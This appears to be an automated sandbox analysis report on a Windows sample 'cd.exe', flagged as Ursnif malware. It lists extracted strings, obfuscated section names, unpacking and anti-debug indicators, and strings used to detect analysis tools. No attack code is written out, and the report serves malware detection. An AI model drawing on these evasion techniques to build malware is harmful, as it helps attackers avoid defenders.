\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\\?\pipe\\Device\NamedPipe\SameObject check failed: D:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\named_pipe_policy.ccntdll.dllkernel32.dllNtAllocateVirtualMemoryNtCloseNtDuplicateObjectNtFreeVirtualMemoryNtProtectVirtualMemoryNtQuerySectionNtQueryVirtualMemoryNtSignalAndWaitForSingleObjectNtWaitForSingleObjectRtlAllocateHeapRtlAnsiStringToUnicodeStringRtlCreateHeapRtlCreateUserThreadRtlDestroyHeapRtlFreeHeap_strnicmpstrlenwcslenmemcpy_wcsnicmpswprintf_sNtQueryInformationThreadNtSetInformationFileNtDeleteValueKeyNtCreateMutantNtOpenMutantNtOpenSectionNtAddAtomNtFindAtomNtDeleteAtomNtQueryInformationAtomg_ntNtSetInformationThreadNtOpenThreadTokenNtOpenThreadTokenEx\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\NtSuspendProcessNtResumeProcessNtCreateProcessExntdll.dllInitializeProcThreadAttributeListUpdateProcThreadAttributeCreateProcessWAction: STATUS_ACCESS_DENIEDD:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\process_thread_policy.ccapp name: command line: \??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ for: Unexpected D:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\registry_policy.ccReal path: CreateKeyOpenKey\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\Handle AccessCheck failed: D:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\signed_policy.cc\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\NtQuerySymbolicLinkObjectNtOpenSymbolicLinkObject%d\Sessions\BNOLINKSNtCreateEventNtOpenEvent\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\
              Source: cd.exeBinary string: \??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\Ntdll.dllNtQueryInformationProcessSTATIC_acroS_winAcroPDF.dllAcroPDFImpl.dllNPPdf32.dllPDFPrevHndlr.dllPDFPrevHndlrShim.dllPDFThumbHndlr.dllPDFShell.dllPDFPropHndlr.dllAcroSBL/b/id/id4057363/if%s_%lu_%lu/acGeckoPluginWindowplugin-container.exe4021007AcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exeSTATICswBrowser|rdr|\Javascripts\JSByteCodeWin.bin|rdr|\AdobeUpdater.dll|sys|\ddraw.dll|sys|\dciman32.dllAdobeReaderSpeedLaunchCmdWndSOFTWARE\Adobe\Acrobat Reader\DC\AcroSpeedLaunchAcrobatSDIWindowAdobeAcrobatAcrobatTimerWndAcrobat runningMcShieldAvSynMgrnavapsvcAntiVirServiceAVPekrnIsVirusCheckerPresentServicesActivefound servicerunningIsVirusCheckerPresent doneAbortWM_CLOSEerr in TimeoutOrExitWaitUntilTimeoutOrMustExitOrVirusCheckerPresenterr in checkerSetThreadPriority worker thread lownot all ops, go into vc modewaitingmsvcr100.dllmsvcp100.dlldo Opsworker throw!worker doneTerminate thread!
              Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@4/27@6/5
              Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: cd.exeString found in binary or memory: /cite/word/install
              Source: cd.exeString found in binary or memory: Couldn't find documents: You have selected documents from both My Library a Shared Group, or from multiple Shared Groups, which is not supported.Documents in multiple groupsPlease select the documents you wish to cite.importing %1 documents from plugin into ??geometry/newLibrarySplittergeometry/horizontalSplittergeometry/verticalSplitterSynchronizing - Step %1 of %2GroupFilterCollectionDeletedFilter1trigger()Synchronizing Zotero - Step %1 of %22duplicateSearchStarted(WorkerJob::Pointer)1highlightAndScrollTo(QList<Document::Pointer>)2allJobsFinished(QList<Document::Pointer>)Invite/invite/?dgcid=Mendeley_Desktop_Invite-colleagues/cite/word/install/importshowSignInmendeley://loginshowJoinMendeleyFormmendeley://registerDelete this document from your library?Delete %1 documents from your library?
              Source: cd.exeString found in binary or memory: https://www.mendeley.com/guides?dgcid=Mendeley_Desktop_Help-menu-Help-guides
              Source: cd.exeString found in binary or memory: 1openHelpGuides()Help Guides1openMendeleyWebsite()Mendeley Website1openFAQ()FAQ1openContactSupport()Contact SupportCheck for UpdatesCheck Now1toggleCheckForPreviewUpdates()Create Backup...1openMendeleyPrivacyPolicy()Privacy Policy1openMendeleyTandCs()Terms and Conditions1showAbout()https://www.mendeley.com/guides?dgcid=Mendeley_Desktop_Help-menu-Help-guideshttps://www.mendeley.com?dgcid=Mendeley_Desktop_Help-menu-websitehttps://www.elsevier.com/legal/elsevier-website-terms-and-conditionshttps://www.elsevier.com/legal/privacy-policyhttps://service.elsevier.com/app/home/supporthub/mendeley/?dgcid=Mendeley_Desktop_Help-menu-FAQhttps://service.elsevier.com/app/contact/supporthub/mendeley?dgcid=Mendeley_Desktop_Help-menu-Contact-SupportOpt-out of Experimental ReleasesOpt-in to Experimental Releases
              Source: cd.exeString found in binary or memory: recently-added
              Source: cd.exeString found in binary or memory: 1timeout()1showDocumentView()all-documentsrecently-addedmy-publicationsfavoritesfavouritesunsortedselectExistingGroupByIdactiongroupIdtabNameoverviewmembersInvalid group tab namefailed to select group1syncProgressChanged(QSet<SynchronizeJob::Action>,QSet<SynchronizeJob::Action>,QSet<SynchronizeJob::Action>)2progressChanged(QSet<SynchronizeJob::Action>,QSet<SynchronizeJob::Action>,QSet<SynchronizeJob::Action>)1updateRecentlyRead()selectExistingDocumentByIdidfileToOpenselectExistingFolderByIdfolderIdcan't fetch unknown document No document found matching the id1showStyleError(StylesFetcher::DownloadFromUrlError,QString)1selectStyle(QString)Style selected - %1Cannot install - %1. Error: %2No folder found matching the remote idMainWindowController::selectFilterByName: Can't find the filter showDocumentViewsetDocumentPropertiesPaneVisibilityselectMetadataTabselectTagsAndNotesTabselectFilterBySlugselectFilterByNameselectDocumentRowselectMainTabselectDocumentByIdselectGroupByIdH
              Source: cd.exeString found in binary or memory: :/images/onboarding/bubbles/add_copy.png
              Source: cd.exeString found in binary or memory: Try Mendeley <a href="https://mendeley.com/reference-management/web-importer/#id_1?dgcid=Mendeley_Desktop_Onboarding-Add-Importer"><b>Web Plugin</b></a> to import documents in just one click
              Source: cd.exeString found in binary or memory: <html><head/><body><p><a href="https://www.mendeley.com/guides/using-citation-editor?dgcid=Mendeley_Desktop_Onboarding-Help-Cite"><span style=" font-weight:600; text-decoration: underline; color:#0000ff;">Cite</span></a> your Mendeley references in Microsoft Word<sup>&reg;</sup> or LibreOffice<sup>&trade;</sup></p></body></html>
              Source: cd.exeString found in binary or memory: <html><head/><body><p>Discover how to <a href="https://www.mendeley.com/guides/desktop/04-read-highlight-annotate?dgcid=Mendeley_Desktop_Onboarding-Help-Cite"><span style=" font-weight:600; text-decoration: underline; color:#0000ff;">highlight and annotate</span></a> documents in your library</p></body></html>
              Source: cd.exeString found in binary or memory: :/images/onboarding/bubbles/next.pngAdd and CreateUserGuidePopoverWidgetHide the Guidance PopupAlt+CClick here to <b>import</b> documents and folders to your library or <b>create new</b> entries manually.or importImport other librariesTry Mendeley <a href="https://mendeley.com/reference-management/web-importer/#id_1?dgcid=Mendeley_Desktop_Onboarding-Add-Importer"><b>Web Plugin</b></a> to import documents in just one clickYour Mendeley Library is backed up to the Mendeley Cloud every time you sync so you can access it on Mendeley Web Library, Mendeley Mobile or other installations of Mendeley Desktop. You can manage synchronization of your file attachments here.Click the help button to find out more about Mendeley and learn how to cite, annotate and collaborate.Learn how to<html><head/><body><p><a href="https://www.mendeley.com/guides/using-citation-editor?dgcid=Mendeley_Desktop_Onboarding-Help-Cite"><span style=" font-weight:600; text-decoration: underline; color:#0000ff;">Cite</span></a> your Mendeley references in Microsoft Word<sup>&reg;</sup> or LibreOffice<sup>&trade;</sup></p></body></html><html><head/><body><p>Discover how to <a href="https://www.mendeley.com/guides/desktop/04-read-highlight-annotate?dgcid=Mendeley_Desktop_Onboarding-Help-Cite"><span style=" font-weight:600; text-decoration: underline; color:#0000ff;">highlight and annotate</span></a> documents in your library</p></body></html>QPushButton:pressed { border: 1px solid white; background: white; color: white; opacity: 255; }QPushButton:pressed { border: 1px solid #F6F6F6; background: #F6F6F6; color: white; opacity: 255; }UserGuidePopover1trackButtonClick()1page0AltContentBiTeXButtonClicked()1page0AltContentEndNoteButtonClicked()1page0AltContentRISButtonClicked()1display()2displaySignal():/images/onboarding/bubbles/next.png:/images/onboarding/bubbles/close-button.pngStorage: Local & CloudThe help button will always be hereUserGuidePopover_Page%1unverifiedH
              Source: cd.exeString found in binary or memory: :/images/onboarding/bubbles/next.pngAdd and CreateUserGuidePopoverWidgetHide the Guidance PopupAlt+CClick here to <b>import</b> documents and folders to your library or <b>create new</b> entries manually.or importImport other librariesTry Mendeley <a href="https://mendeley.com/reference-management/web-importer/#id_1?dgcid=Mendeley_Desktop_Onboarding-Add-Importer"><b>Web Plugin</b></a> to import documents in just one clickYour Mendeley Library is backed up to the Mendeley Cloud every time you sync so you can access it on Mendeley Web Library, Mendeley Mobile or other installations of Mendeley Desktop. You can manage synchronization of your file attachments here.Click the help button to find out more about Mendeley and learn how to cite, annotate and collaborate.Learn how to<html><head/><body><p><a href="https://www.mendeley.com/guides/using-citation-editor?dgcid=Mendeley_Desktop_Onboarding-Help-Cite"><span style=" font-weight:600; text-decoration: underline; color:#0000ff;">Cite</span></a> your Mendeley references in Microsoft Word<sup>&reg;</sup> or LibreOffice<sup>&trade;</sup></p></body></html><html><head/><body><p>Discover how to <a href="https://www.mendeley.com/guides/desktop/04-read-highlight-annotate?dgcid=Mendeley_Desktop_Onboarding-Help-Cite"><span style=" font-weight:600; text-decoration: underline; color:#0000ff;">highlight and annotate</span></a> documents in your library</p></body></html>QPushButton:pressed { border: 1px solid white; background: white; color: white; opacity: 255; }QPushButton:pressed { border: 1px solid #F6F6F6; background: #F6F6F6; color: white; opacity: 255; }UserGuidePopover1trackButtonClick()1page0AltContentBiTeXButtonClicked()1page0AltContentEndNoteButtonClicked()1page0AltContentRISButtonClicked()1display()2displaySignal():/images/onboarding/bubbles/next.png:/images/onboarding/bubbles/close-button.pngStorage: Local & CloudThe help button will always be hereUserGuidePopover_Page%1unverifiedH
              Source: cd.exeString found in binary or memory: Please upgrade to a supported version of MS Word and re-install the Mendeley plugin through Mendeley Desktop's 'Tools' menu. Sorry for the inconvenience.
              Source: cd.exeString found in binary or memory: 1updateWordPlugin()1uninstallWordPlugin()Please upgrade to a supported version of MS Word and re-install the Mendeley plugin through Mendeley Desktop's 'Tools' menu. Sorry for the inconvenience.The Mendeley plugin requires Microsoft Word %1 or later.
              Source: cd.exeString found in binary or memory: documents-add
              Source: cd.exeString found in binary or memory: folder-add
              Source: cd.exeString found in binary or memory: 333?editMenuSeparatorviewerActions.selectionMenuviewerActions.highlightMenuviewerActions.zoomModeMenudocuments-addAddnewDocumentActionImport additional documents to the current collectionaddFilesActionaddFolderActionWatch FolderwatchFolderActionAdd Entry ManuallyaddManualEntryActionemptyEmptyemptyTrashActionDelete all documents from the Trashdocument-deleteremoveDocumentActionMove the selected documents to the TrashremoveDocumentActionTrashContextDelete the selected documents from the TrashrestoreRestoreRestore DocumentsrestoreDocumentActionRestore the selected documents to their original locationRemove from FolderremoveFromFolderActionRemove the selected documents from this folderRename Document Files...renameDocumentActionfolder-addCreate FolderNew Folder...newFolderActionCreate a new folderNew GroupNew Group...newGroupActionCreate a new groupfolder-removeRemove CollectionRemoveCollectionActionRemove the current collectioneditSettingsActionRename Collection...renameFolderActionmagnifiercatalogSearchActionMendeley Catalog Searchrelated-documentsRelatedrecommendActionRecommend related documentsSyncSynchronize LibrarysynchronizeActionSynchronize your library with Mendeley WebHelpHelp ContentshelpActionOpen the Online Help Guide for MendeleyFindfindActionFind NextfindNextActionFind PreviousfindPreviousActionselectAllActionciteCitesendCitationActionSend citation to plugincancelcancelCitationActionCancel sending citation to pluginEdit...editDocumentActionactionNotDuplicatesUpdate DetailslookupMetadataActionfullscreenFullscreenfullScreenActionzoomActionzoom-inZoom InzoomInActionzoom-outZoom OutzoomOutActionrotate-leftRotate LeftrotateAnticlockwiseActionrotate-rightRotate RightrotateClockwiseActionpanPanpanActionfit-pageFit to PagezoomModeFitPageActionfit-widthFit to WidthzoomModeFitWidthActionzoomModeCustomselectActionselect-rectangleSelect RectangleselectRectangleActionselect-textSelectSelect TextselectFlowActionColorSelect ColorselectColorActionhighlightActionhighlight-textHighlightHighlight TexthighlightTextActionhighlight-rectHighlight RectanglehighlightRectangleActionnoteNoteAdd NoteaddNoteActioncopyActionpasteAction:/icons/64x64/actions/%1/%2.png:/icons/toolbar/%1/%2.png:/icons/toolbar/%1/%2-active.png:/icons/16x16/actions/%1.png
              Source: cd.exeString found in binary or memory: The service logs events immediately and the driver installs as a boot-start driver to capture activity from early in the boot that the service will write to the event log when it starts.
              Source: cd.exeString found in binary or memory: Try '%ls --help' for more information.
              Source: cd.exeString found in binary or memory: Try '%ls --help' for more information.
              Source: cd.exeString found in binary or memory: Commands : /install - Installs Steam Client Service
              Source: cd.exeString found in binary or memory: /installscript <file> <appid> - Runs a Steam game install script
              Source: cd.exeString found in binary or memory: /installscript
              Source: cd.exeString found in binary or memory: /installscript failed on: %s: %d
              Source: cd.exeString found in binary or memory: /install
              Source: cd.exeString found in binary or memory: /install service install failed
              Source: cd.exeString found in binary or memory: /setupsteam <command line> - Runs SteamSetup.exe/hide/installscript/installscript failed on: %s: %d
              Source: cd.exeString found in binary or memory: /install/install service install failed
              Source: cd.exeString found in binary or memory: /Install
              Source: cd.exeString found in binary or memory: /Stop
              Source: cd.exeString found in binary or memory: /Stop
              Source: cd.exeString found in binary or memory: /Install/Uninstall/Start/Stop/RunAsService
              Source: cd.exeString found in binary or memory: /Install/Uninstall/Start/Stop/RunAsService
              Source: cd.exeString found in binary or memory: /Install/Uninstall/Start/Stop/RunAsService
              Source: cd.exeString found in binary or memory: ,ZJAll AccessRead/WriteExecuteQuery ValueSet ValueCreate Sub KeyEnumerate Sub KeysNotifyCreate LinkWOW64_ResWOW64_32KeyWOW64_64KeyGeneric Read/Write/ExecuteGeneric Read/WriteGeneric Read/ExecuteGeneric Write/ExecuteGeneric ReadGeneric WriteGeneric ExecuteRead Data/List DirectoryWrite Data/Add FileAppend Data/Add Subdirectory/Create Pipe InstanceRead EAWrite EAExecute/TraverseDelete ChildRead AttributesWrite AttributesRead ControlWrite DACWrite OwnerSynchronizeAccess System SecurityMaximum Allowedkernel32.dllSD\fltlib.dll%llx%lf%s%07d%02u:%02u:%02u.%07u%02u:%02u:%02u%I64d0x%I64x-1%I64u KB MB GBWindows 2000Windows XPWindows XP x64Windows Server 2003Windows VistaWindows Server 2008Windows 7Windows Server 2008 R2Windows 8Windows Server 2012Windows 8.1Windows Server 2012 R2Windows 10Windows Server 2016Windows %d.%d (build %d.%d)%08x:%08x%02X64-bit32-bit%x:%x:%x:%x:%x:%x:%x:%x%d.%d.%d.%d:%d:None
              Source: cd.exeString found in binary or memory: -help
              Source: cd.exeString found in binary or memory: sun/launcher/LauncherHelper
              Source: cd.exeString found in binary or memory: Error: Corrupt jvm.cfg file; cycle in alias list.ERRORError: Unable to resolve VM alias %sWarning: %s VM not supported; %s VM will be usedError: %s VM not supported-version-fullversion-help-?-jar-X-XX:NativeMemoryTracking=%s%d=%s%s%dTRACER_MARKER: NativeMemoryTracking: env var is %s
              Source: cd.exeString found in binary or memory: sun/launcher/LauncherHelper(Z[B)Ljava/lang/String;makePlatformStringjava/lang/String(ZILjava/lang/String;)Ljava/lang/Class;checkAndLoadMain%ld micro seconds to load main class
              Source: cd.exeString found in binary or memory: browser-startup-dialog
              Source: cd.exeString found in binary or memory: enable-service-binary-launcher
              Source: cd.exeString found in binary or memory: gpu-launcher
              Source: cd.exeString found in binary or memory: gpu-sandbox-start-early
              Source: cd.exeString found in binary or memory: gpu-startup-dialog
              Source: cd.exeString found in binary or memory: ppapi-plugin-launcher
              Source: cd.exeString found in binary or memory: ppapi-startup-dialog
              Source: cd.exeString found in binary or memory: renderer-startup-dialog
              Source: cd.exeString found in binary or memory: utility-startup-dialog
              Source: cd.exeString found in binary or memory: gpu2-startup-dialog
              Source: cd.exeString found in binary or memory: --start-crash-handler
              Source: cd.exeString found in binary or memory: QVersionNumbera+CONOUT$--start-crash-handlerRadareOrgCutterQList
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
              Source: cd.exeStatic file information: File size 3922432 > 1048576
              Source: cd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\a\1\s\Win32\Release\logonsessions.pdb source: cd.exe
              Source: Binary string: c:\stream\develop\Regionhunt.pdb source: cd.exe
              Source: Binary string: D:\a\1\s\Win32\Release\RamMap.pdb source: cd.exe
              Source: Binary string: D:\B\T\BuildResults\bin\Release\AcrobatInfo.pdb))) source: cd.exe
              Source: Binary string: D:\B\T\BuildResults\bin\Release\AcrobatInfo.pdb source: cd.exe
              Source: Binary string: D:\B\T\BuildResults\bin\Release\TextExtractor.pdb666 source: cd.exe
              Source: Binary string: C:\agent\_work\93\s\Win32\Release\autoruns.pdb source: cd.exe
              Source: Binary string: D:\a\1\s\Win32\Release\adrestore.pdb source: cd.exe
              Source: Binary string: D:\B\T\BuildResults\bin\Release\TextExtractor.pdb source: cd.exe

              Data Obfuscation:

              barindex
              Detected unpacking (overwrites its own PE header)Show sources
              Source: C:\Users\user\Desktop\cd.exeUnpacked PE file: 1.2.cd.exe.400000.0.unpack
              Detected unpacking (changes PE section rights)Show sources
              Source: C:\Users\user\Desktop\cd.exeUnpacked PE file: 1.2.cd.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;aZAqrnJo:R;BGOllIzc:R;yQtoRARz:R;dZLJZOuu:R;sdDGHbsk:R;cQfsAIeK:R;nJjdtQIB:R;pcHOcQzM:R;wDcvvqlu:R;orXBiygL:R;AiZKCfrK:R;myoGvTPf:R;AVTlzkED:R;bzLENpIH:R;XcYnViEt:R;mbKhPZXg:R;lUpFJlcq:R;yiDSdvAK:R;tWLpgAgw:R;bTGdVUjl:R;ziIDaoXi:R;LzawvTwX:R;LnIDzdzd:R;wkCXpCGo:R;nqpeKqho:R;MRjgEOqy:R;JcLmCXgA:R;OtycdIdu:R;IbVOTdPC:R;FgFHDyjf:R;ybeqBvHg:R;IbzUQYJs:R;AQBgSYnS:R;XxFUmGWX:R;afVQQtfj:R;nwvMTysA:R;ZHPQhgLD:R;pxMMJkwk:R;JXHCNYcJ:R;lYRopDTG:R;bcYTpMaT:R;nuBezWiu:R;yPvpmSBg:R;OoEfGgTM:R;kYRGCWEC:R;ssiFbfZW:R;KHKSQqok:R;NcZcjaDP:R;mIUEylgT:R;lluFjCpP:R;BHqNuAAF:R;dWFkhiaJ:R;NeKPPFmp:R;mRaJxCpw:R;sjZRApAc:R;mJuapRBt:R;AUQwTDRB:R;Mzpcxreq:R;DQLewjlc:R;yQzDovRx:R;KsasGyWE:R;qALhWEsZ:R;EhLKChYp:R;juiuAwmE:R;FPCcnPuO:R;DQPOFovS:R;eeLebknr:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_0040322B push ecx; ret 1_2_0040323B
              Source: cd.exeStatic PE information: section name: aZAqrnJo
              Source: cd.exeStatic PE information: section name: BGOllIzc
              Source: cd.exeStatic PE information: section name: yQtoRARz
              Source: cd.exeStatic PE information: section name: dZLJZOuu
              Source: cd.exeStatic PE information: section name: sdDGHbsk
              Source: cd.exeStatic PE information: section name: cQfsAIeK
              Source: cd.exeStatic PE information: section name: nJjdtQIB
              Source: cd.exeStatic PE information: section name: pcHOcQzM
              Source: cd.exeStatic PE information: section name: wDcvvqlu
              Source: cd.exeStatic PE information: section name: orXBiygL
              Source: cd.exeStatic PE information: section name: AiZKCfrK
              Source: cd.exeStatic PE information: section name: myoGvTPf
              Source: cd.exeStatic PE information: section name: AVTlzkED
              Source: cd.exeStatic PE information: section name: bzLENpIH
              Source: cd.exeStatic PE information: section name: XcYnViEt
              Source: cd.exeStatic PE information: section name: mbKhPZXg
              Source: cd.exeStatic PE information: section name: lUpFJlcq
              Source: cd.exeStatic PE information: section name: yiDSdvAK
              Source: cd.exeStatic PE information: section name: tWLpgAgw
              Source: cd.exeStatic PE information: section name: bTGdVUjl
              Source: cd.exeStatic PE information: section name: ziIDaoXi
              Source: cd.exeStatic PE information: section name: LzawvTwX
              Source: cd.exeStatic PE information: section name: LnIDzdzd
              Source: cd.exeStatic PE information: section name: wkCXpCGo
              Source: cd.exeStatic PE information: section name: nqpeKqho
              Source: cd.exeStatic PE information: section name: MRjgEOqy
              Source: cd.exeStatic PE information: section name: JcLmCXgA
              Source: cd.exeStatic PE information: section name: OtycdIdu
              Source: cd.exeStatic PE information: section name: IbVOTdPC
              Source: cd.exeStatic PE information: section name: FgFHDyjf
              Source: cd.exeStatic PE information: section name: ybeqBvHg
              Source: cd.exeStatic PE information: section name: IbzUQYJs
              Source: cd.exeStatic PE information: section name: AQBgSYnS
              Source: cd.exeStatic PE information: section name: XxFUmGWX
              Source: cd.exeStatic PE information: section name: afVQQtfj
              Source: cd.exeStatic PE information: section name: nwvMTysA
              Source: cd.exeStatic PE information: section name: ZHPQhgLD
              Source: cd.exeStatic PE information: section name: pxMMJkwk
              Source: cd.exeStatic PE information: section name: JXHCNYcJ
              Source: cd.exeStatic PE information: section name: lYRopDTG
              Source: cd.exeStatic PE information: section name: bcYTpMaT
              Source: cd.exeStatic PE information: section name: nuBezWiu
              Source: cd.exeStatic PE information: section name: yPvpmSBg
              Source: cd.exeStatic PE information: section name: OoEfGgTM
              Source: cd.exeStatic PE information: section name: kYRGCWEC
              Source: cd.exeStatic PE information: section name: ssiFbfZW
              Source: cd.exeStatic PE information: section name: KHKSQqok
              Source: cd.exeStatic PE information: section name: NcZcjaDP
              Source: cd.exeStatic PE information: section name: mIUEylgT
              Source: cd.exeStatic PE information: section name: lluFjCpP
              Source: cd.exeStatic PE information: section name: BHqNuAAF
              Source: cd.exeStatic PE information: section name: dWFkhiaJ
              Source: cd.exeStatic PE information: section name: NeKPPFmp
              Source: cd.exeStatic PE information: section name: mRaJxCpw
              Source: cd.exeStatic PE information: section name: sjZRApAc
              Source: cd.exeStatic PE information: section name: mJuapRBt
              Source: cd.exeStatic PE information: section name: AUQwTDRB
              Source: cd.exeStatic PE information: section name: Mzpcxreq
              Source: cd.exeStatic PE information: section name: DQLewjlc
              Source: cd.exeStatic PE information: section name: yQzDovRx
              Source: cd.exeStatic PE information: section name: KsasGyWE
              Source: cd.exeStatic PE information: section name: qALhWEsZ
              Source: cd.exeStatic PE information: section name: EhLKChYp
              Source: cd.exeStatic PE information: section name: juiuAwmE
              Source: cd.exeStatic PE information: section name: FPCcnPuO
              Source: cd.exeStatic PE information: section name: DQPOFovS
              Source: cd.exeStatic PE information: section name: eeLebknr
              Source: initial sampleStatic PE information: section name: .text entropy: 6.93749374769

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Yara detected UrsnifShow sources
              Source: Yara matchFile source: 00000001.00000003.408326958.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408240054.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.407536237.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.429559902.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408480874.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408113887.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.407620205.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408655668.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408034062.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: cd.exe PID: 6888, type: MEMORYSTR
              Source: C:\Users\user\Desktop\cd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\cd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion:

              barindex
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
              Source: cd.exeBinary or memory string: IIRP_MJ_FASTIO_PROCMON.EXEPROCEXP.EXEAUTORUNS.EXESYSTEMPAGEFILE.SYS$MFT$MFTMIRR$LOGFILE$VOLUME$ATTRDEF$ROOT$BITMAP$BOOT$BADCLUS$SECURE$UPCASE$EXTENDFAST IOINCLUDEEXCLUDE<BAD>OKAY TO OVERWRITE EVENT LOG ''?AN ERROR OCCURRED OPENING THE SNAPSHOT ''APPLYING EVENT FILTEROPERATION CANCELLED: THE LISTVIEW DATA MAY BE INCOMPLETEPROCESS MONITOR CAN OPEN AT MOST BACKING FILES<PAGEFILE>YESNOEVENTPROCESSINDEXSTACKFRAMEDEPTHADDRESS + PATHLOCATIONPROCESSPROCESSIDPARENTPROCESSIDPARENTPROCESSINDEXAUTHENTICATIONIDCREATETIMEFINISHTIMEISVIRTUALIZEDIS64BITINTEGRITYOWNERPROCESSNAMECOMMANDLINECOMPANYNAMEVERSIONDESCRIPTIONMODULELISTMODULETIMESTAMPBASEADDRESSSIZECOMPANYPROCESS MONITOR - EXPORTING EVENT DATAWT, CCS=UTF-8"%S"
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_004359CA mov eax, dword ptr fs:[00000030h]1_2_004359CA
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_0043559C push dword ptr fs:[00000030h]1_2_0043559C
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_008004F4 mov eax, dword ptr fs:[00000030h]1_2_008004F4
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_008000C6 push dword ptr fs:[00000030h]1_2_008000C6
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_00401873 GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,NtGetContextThread,NtGetContextThread,LdrInitializeThunk,1_2_00401873
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_00402F32 InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError,1_2_00402F32
              Source: cd.exeBinary or memory string: Software\Microsoft\Windows\CurrentVersion\Policies\SystemEnableLUA/RegisterFileTypesOwnership /PRODUCT:Reader /VERSION:12.0 /FixPDF 3305580Click on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770Click on 'Change' to select default PDF handler#32770/\ADelRCP.exeClick on 'Change' to select default PDF handler.pdfpropertiesShowAppPickerForPDF.exeProgram ManagerPROGMANClick on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770Click on 'Change' to select default PDF handler#32770Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoiceSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoiceSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdfApplication{A6EADE66-0000-0000-484E-7E8A45000000}SOFTWARE\Adobe\Acrobat Reader\{AC76BA86-0000-0000-7761-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-7760-7E8A45000000}{AC76BA86-0000-0000-BA7E-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\VersionMajorVersionMinor12VersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Wow6432Node\Adobe\Acrobat Reader\SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\SOFTWARE\Adobe\Adobe Acrobat\.0\InstallerPATHVersionMajorVersionMinor1207760-BA7E-7AD7-VersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Wow6432Node\Adobe\Acrobat Reader\SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\SOFTWARE\Adobe\Adobe 